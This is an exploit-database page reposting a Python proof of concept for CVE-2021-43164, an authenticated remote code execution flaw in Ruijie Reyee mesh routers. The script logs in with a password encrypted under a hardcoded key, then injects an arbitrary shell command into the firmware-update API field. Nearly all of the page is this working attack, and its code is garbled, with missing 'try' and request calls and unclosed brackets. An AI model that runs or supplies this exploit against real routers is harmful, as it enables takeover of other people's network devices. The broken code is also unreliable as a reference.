Ruijie Reyee Mesh Router Remote Code Execution

CVE Category Price Severity
CVE-2021-43164 CWE-94 $10,000 High
Author Risk Exploitation Type Date
Jack Doe Critical Remote 2022-05-11

CVSS vector description

Our sensors found this exploit at:

Below is a copy:

Ruijie Reyee Mesh Router Remote Code Execution
# Exploit Title: Ruijie Reyee Mesh Router - Remote Code Execution (RCE) (Authenticated)
# Google Dork: None
# Date: November 1, 2021
# Exploit Author: Minh Khoa of VSEC
# Vendor Homepage:
# Software Link:
# Version: ReyeeOS 1.55.1915 - EW_3.0(1)B11P35 and EW_3.0(1)B11P55
# Tested on: Ruijie RG-EW1200, Ruijie RG-EW1200G PRO
# CVE: CVE-2021-43164


import os
import sys
import time
import requests
import json

def enc(PASS):
    key   = "RjYkhwzx$2018!"
    shell = "echo '{}' | openssl enc -aes-256-cbc -a -k '{}' -md md5 2>/dev/null".format(PASS, key)
    return os.popen(shell).read().strip()

    TARGET  = sys.argv[1]
    USER    = sys.argv[2]
    PASS    = sys.argv[3]
    COMMAND = sys.argv[4]
except Exception:
    print("CVE-2021-43164 PoC")
    print("Usage:   python3 <target> <user> <pass> <command>")
    print("Example: python3 admin password 'touch /tmp/pwned'")

endpoint = "http://{}/cgi-bin/luci/api/auth".format(TARGET)
payload = {
        "method": "login",
        "params": {
            "username": USER,
            "password": enc(PASS),
            "encry": True,
            "time": int(time.time()),
            "limit": False

r =, json=payload)
sid = json.loads(r.text)["data"]["sid"]

endpoint = "http://{}/cgi-bin/luci/api/wireless?auth={}".format(TARGET, sid)
payload = {
        "method": "updateVersion",
        "params": {
            "jsonparam": "'; {} #".format(COMMAND)

r =, json=payload)

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.